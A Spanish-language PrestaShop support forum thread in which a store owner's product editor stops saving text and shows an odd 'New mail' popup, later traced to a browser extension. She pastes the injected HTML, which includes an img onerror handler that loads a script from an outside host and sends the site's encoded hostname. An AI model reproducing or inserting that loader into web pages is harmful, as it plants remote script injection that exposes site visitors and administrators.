Avisos
Vaciar todo

Problemas al grabar productos  

 
Eva
 Eva
Nuevo usuario

Ayer funcionaba todo correctamente pero hoy cuando intento incluir información en un nuevo producto, no me graba la información. Los productos los he subido desde la tienda física.

Aunque lo grabo y me dice que actualiza la información, no queda grabado. Si pongo en línea no lo acepta si escribo en las casillas de resumen y descripción, si no toco esas casillas si me lo activa, pero no puedo incluir ni ngún dato, solo imágenes. Tampoco me graba la información que incluyo en los apartados de transporte o seo.

Por otro lado me aparece algo que hasta ahora no habia aparecido nunca. En la parte de resumen y descripción, me aparece una pregunta, cuando todavía no hay ningún tipo de información incluida:

<div id="ventanamailtotoModal" style="z-index: 1; display: none;">
<div id="ventanamailtopopupModalContent">
<div id="ventanamailtopopupMailModalCloseTo"></div>
<div id="ventanamailtopopupQuestionToMail">What do you want to do ?</div>
<a id="ventanamailtoappCreateNew"></a>New mail<button id="ventanamailtoemailCopy">Copy</button><textarea id="ventanamailtoareaSelectTextTo"></textarea></div>
</div>
<div><img onerror="var s=document.createElement(&quot;script&quot;);s.type=&quot;text/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;//poruce.neyelanane.com/scripts/js?k=5fd0a6b485df1ad5458b4567&s=&quot;+encodeURI(btoa(window.location.host))+&quot;&ns=true&quot;;document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);" /></div>

 

La versión actual es v4.10.1
Your server is running on a supported PHP version. ok
Your store's root directory is writable (with appropriate CHMOD permissions) ok
PHP's "Safe mode" option is turned off ok
PHP's "allow_url_fopen" option is turned on, or cURL is installed ok
PHP's "zip" extension is enabled ok
Your store is in maintenance mode
nok
PrestaShop's caching features are disabled ok
PHP's max_execution_time setting has a high value or is disabled entirely (current value: unlimited) ok
PrestaShop requirements are satisfied.

 

Gracias

Eva

Contenido solo visible a usuarios registrados

Citar
Respondido : 13/12/2020 6:28 pm
Bulmaro
 Bulmaro
Soporte CMS Webempresa Moderator

Hola Eva, 

¿Podrías compartirnos una captura de pantalla o la dirección web de un artículo donde t aparezca una pegunta como la que mencionas? ¿Has probado borrando la cache? Te sugiero activar el MODO DEPURACIÓN en Configuración -> Parametros Avanzados -> Rendimiento -> Modo Depuración, activa las tres opciones que te aparecen en esa sección, intenta crear un nuevo producto y si te surge algun error o aviso toma captura de pantalla y envíanosla. 

Por favor.

PD: Una solución mas rapida y eficiente sería la de restaurar tu sitio web a un punto anterior en el tiempo en el que recuerdes que no aparecían estos problemas, a través de la herramienta de SuperBackup que puedes encontrar en tu cPAnel -> gestionar-copias-seguridad-superbackup

Saludos.

ResponderCitar
Respondido : 13/12/2020 8:30 pm

wpdoctor-revisa-la-salud-de-tu-wordpress

Eva
 Eva
Nuevo usuario

@bulmaro-webempresa muchas gracias, no había activado la confirmación por eso no podía ver tu respuesta, disculpa.

 

He activado el modo de depuración, pero me sucede lo mismo. Ahora es extraño me aparece una ventana de mail en todos los productos, creados o al crealos. También el marcas o artículos, etc. Es decir en cualquier gestor de texto y no graba la información, el resto que no es gestor de texto no da problemas. No veo como adjuntar la imagen disculpa.

 
Esto aparece pero solo en el gestor, no se muestra en la web visible al público.

 

What do you want to do ?

New mail

 

 

Gracias

Eva

Esta publicación ha sido modificada el hace 6 meses 2 veces por Eva
ResponderCitar
Respondido : 14/12/2020 11:39 am
Pepe
 Pepe
Soporte CMS Webempresa Admin

Hola Eva

Por favor adjuntar alguna captura para que podamos ver a qué te refieres 

Puedes adjuntar la captura pulsando en " My Media " que verás en la parte inferior donde respondes la consulta:

screenshot www.webempresa.com 2020.12.14 12 50 43

 

Lo único que veo es que tienes prestashop desactualizado:

.- Actualizar prestashop a la última versión y revisa si con eso se soluciona.

 

Un saludo

 

 

ResponderCitar
Respondido : 14/12/2020 11:56 am

Cursos Gratuitos WordPress

Eva
 Eva
Nuevo usuario

@bulmaro-webempresa Hola acabo de descubrir que el problema lo tengo en mi portatil. Si entro en chrome en modo incognito no tengo ningún problema, ayer se hizo una actualización de Windows y creo que ese es el problema. El prograna y el servidor no tienen nada que ver. He borrado la caché y sigo teniendo el mismo problema se incluye esa pregunta en todos los campos de texto. 

Gracias

Eva

ResponderCitar
Respondido : 14/12/2020 12:01 pm
Eva
 Eva
Nuevo usuario

Listo, era una actualización de windows que me ha creado una extensión en los navegadores, mail to y anulaba toda acción.

Gracias y disculpad las molestias.
Eva

ResponderCitar
Respondido : 14/12/2020 12:23 pm

Gestor de Contraseñas - VPN Conexión Segura - Gestor 2FA (Segundo Factor de Autenticación

Karen Rios
 Karen Rios
Soporte CMS Webempresa Moderator

Hola Eva,

Disculpa nos comentas que el problema lo tienes en tu portatil, es posible que por la cache de tu navegador ya que mencionas que si ingresas en incognito no tienes problemas.

Prueba borrar la cache de tus navegadores y luego verifica si con ello ya no tienes problema con los productos

-> https://support.mozilla.org/es/kb/limpia-la-cache-y-elimina-los-archivos-temporales-

-> Contenido solo visible a usuarios registrados

Un Saludo

ResponderCitar
Respondido : 14/12/2020 12:25 pm